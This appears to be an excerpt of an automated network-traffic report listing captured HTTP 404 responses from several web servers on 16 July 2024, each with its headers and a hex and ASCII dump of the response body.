3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:23:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:23:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:23:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJCoYmK3BjF0UYVznBl%2BiE5ToopB7PPycSta6r7iXE8G7ip7WNPiEfCM3aTNKQec37I37cweaMm8b4p3Fz8jF3tf%2FIAGR4iShFkrP7Cj6LFLt4%2FxX79xovgoyKYNQSf%2BO4xBhgZmrOdJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a3f902dbf841906-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 
5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B177A76T7IPVWI1sKZ%2FxOjhUmnR0Jjl3q70OPIiKib9b%2Fi%2FAgs%2B7fY66BeYkDaLsiQSyD7yw9F9YFRK54hkxEkUULKafKpcwsIqcggv8EBUPPdH6qZPA9efsRy0Bwoh4Z2pz7IVr22eK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a3f903d9d29439f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 4c ea 
5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 85 06 a9 14 d9 4d 11 5b 21 86 09 e7 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2aN9wr7lJ29%2FUjEFpICarqZkz%2ByjmxfKov%2BrKmR31agOYSNKAh85icrVNVa5Nh8JpdDNJvxiVT9VyVhnynW%2BXCeDCnOPBHWf069Mn1EyS8mCxIMrC6%2F7JH0dHH%2Bcz0%2BtXDWDrpuIpr4v"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a3f904d8aec0c7a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 aa 
4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 85 06 a9 14 d9 4d Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwfNoiDezcem3Y6PqHqhqTpcfGlo4MO9njk8RKNTeSQKBJ5y%2BcqpK25nTQ36ZpO3HvUbtqIDga65DIIQrZ0bb3sX3Orm1Ts3huRYtuWDxyuiDc3N8RlUOiBFGaYH8kinTkHpWVrPuPBg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a3f905d7fed4414-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 
69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: CSRF=1721107453781; path=/Set-Cookie: PHPSESSID=4i6sn1bhhvc7a5s6kkdqb09nvc; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.itsjojosiwas.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p79prrqyA5CrYcCZR7vzG7Ds5MoZGQaAg0WaRU1uaQg4IPJnvAYwgA8zaof52OwwDPL2vhaKAYDFK2H0tNVhn6TENg6YFyOq9pO8anOEgVqh7IRH05%2BBpMNKW74YQkfJ2xnC6OTeuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a3f9090df395e66-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 30 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 77 db 46 92 e8 67 e9 57 74 e8 49 28 6e 08 10 8d 37 48 49 99 8c c7 b3 eb 73 a2 89 37 76 76 ee ac ed eb 03 82 4d 12 36 08 20 00 a8 e7 ea f7 ec b9 7f 63 7f d9 3d 55 d5 78 51 a0 48 59 f6 6c f6 5e 79 26 52 0b e8 ae 57 57 55 bf aa 1a c7 df fc f9 e7 e7 6f fe fe ea 05 5b 16 ab e8 f4 f0 f8 1b 45 79 1b ce d9 cb 17 cc 63 ef 4f d9 31 3c 66 91 1f 2f 4e 7a 22 56 7e 7d dd 63 41 e4 e7 f9 49 2f 14 1e 8b 12 7f 16 c6 0b 25 0f 0b c1 e2 44 f9 98 f7 4e d9 f1 37 6f 45 3c 0b e7 ef 15 a5 05 cf dd 05 cf 7d 00 bc a3 45 21 90 c8 c1 7f 7c 73 f4 f2 c5 e0 fd 29 bc 39 dd 0e 7e 0b 68 45 69 83 5f 0a 7f 76 7a 78 70 bc 12 85 cf 82 a5 9f e5 a2 38 e9 fd fa e6 2f 8a db 63 23 78 13 85 f1 27 96 89 e8 a4 97 66 c9 3c 8c 44 8f 2d 33 31 3f e9 2d 8b 22 1d 8f 46 8b 55 ba 50 93 6c 31 ba 9c c7 23 ce ef b6 0a e3 c5 d4 0f 3e 35 9b e5 e3 d1 e8 e2 e2 42 0d 8b fc 63 f2 31 c9 c3 0b 3f 57 83 64 35 ba 5c 45 59 1a a8 e9 32 45 38 44 56 ec af c4 49 Data Ascii: 30f1}kwFgWtI(n7HIs7vvM6 
c=UxQHYl^y&RWWUo[EycO1<f/Nz"V~}cAI/%DN7oE<}E!|s)9~hEi_vzxp8/c#x'f<D-31?-"FUPl1#>5Bc1?Wd5\EY2E8DVI
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: CSRF=1721107458873; path=/Set-Cookie: PHPSESSID=oh1qlrjchi3ieb6kumhn30vg1c; path=/Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.itsjojosiwas.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Tr13Z8%2BW9oolTbsEUDD%2BYtwE%2BwIivvxrVfK%2FBDsuVX2M1v%2BTSlJvFGhb7Td%2BVlpEX%2Fk6EXiopC0Rq3HVKvlzRaG6qKHAmRhWWM%2Flx%2F%2FWTZcHe5AlGDEX7NMq6Nnvk2wn2JZyiSiVQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a3f90b0b8204232-EWRalt-svc: h3=":443"; ma=86400Data Raw: 37 63 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 39 20 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 38 20 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 65 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 Data Ascii: 7c23<!DOCTYPE html><!--[if IE 9 ]> <html lang="en-US" class="ie9 
loading-site no-js"> <![endif]--><!--[if IE 8 ]> <html lang="en-US" class="ie8 loading-site no-js"> <![endif]--><!--[if (gte IE 9)|!(IE)]><!--><html lang="en-US" class="loading-site no-js"> <!--<![endif]--><head><meta charset="UTF-8" /><link rel="prof
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Jul 2024 05:24:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
